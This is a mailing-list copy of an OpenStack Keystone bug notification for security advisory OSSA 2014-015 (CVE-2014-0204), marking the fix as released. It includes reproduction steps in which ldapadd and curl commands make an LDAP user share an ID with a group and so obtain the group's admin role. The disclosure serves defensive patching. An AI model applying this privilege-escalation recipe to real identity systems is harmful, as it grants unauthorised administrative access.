yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1309228] Re: [OSSA 2014-015] User gets group auth if same id (CVE-2014-0204)

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Alan Pevec <1309228@xxxxxxxxxxxxxxxxxx>
Date: Thu, 05 Jun 2014 22:25:45 -0000
Reply-to: Bug 1309228 <1309228@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

** Changed in: keystone/icehouse
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1309228

Title:
  [OSSA 2014-015] User gets group auth if same id (CVE-2014-0204)

Status in OpenStack Identity (Keystone):
  Fix Committed
Status in Keystone icehouse series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  
  If a user has the same ID as a group and that group has roles granted to it, the user gets the roles (even if they're not in the group).

  Note that Keystone typically assigns IDs and with uuid4 you're not
  going to get a user with the same ID as a group, but some setups use
  LDAP so the IDs come from the LDAP entries.

  Here's instructions on how to recreate:

  1) Start with LDAP system (set up with devstack)

  2) Create a user with an id of suspectid

  $ ldapadd -D "cn=Manager,dc=openstack,dc=org" -w "ofs5dac"

  dn: cn=suspectid,ou=Users,dc=openstack,dc=org
  objectclass: inetorgperson
  sn: suspect
  userPassword: blkpwd

  3) Create a group with an id of suspectid

  $ ldapadd -D "cn=Manager,dc=openstack,dc=org" -w "ofs5dac"

  dn: cn=suspectid,ou=UserGroups,dc=openstack,dc=org
  objectclass: groupOfNames
  ou: suspect
  member: cn=dumb,dc=nonexistent

  $ openstack --os-identity-api=3 --os-auth-url http://localhost:5000/v3
  group list

  4) Grant a role to the group on a project

  $ openstack --os-identity-api=3 --os-auth-url http://localhost:5000/v3
  role add --group suspect --project demo admin

  5) Get a token as the user, notice that the user has the group's
  access.

  
  $ curl -s \
    -H "Content-Type: application/json" \
    -d '
  { "auth": {
      "passwordCredentials": {
        "username": "suspect",
        "password": "blkpwd"
      },
      "tenantName": "demo"
    }
  }' \
    http://localhost:35357/v2.0/tokens | python -m json.tool

  ---

              "roles": [
                  {
                      "name": "admin"
                  }
              ],

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1309228/+subscriptions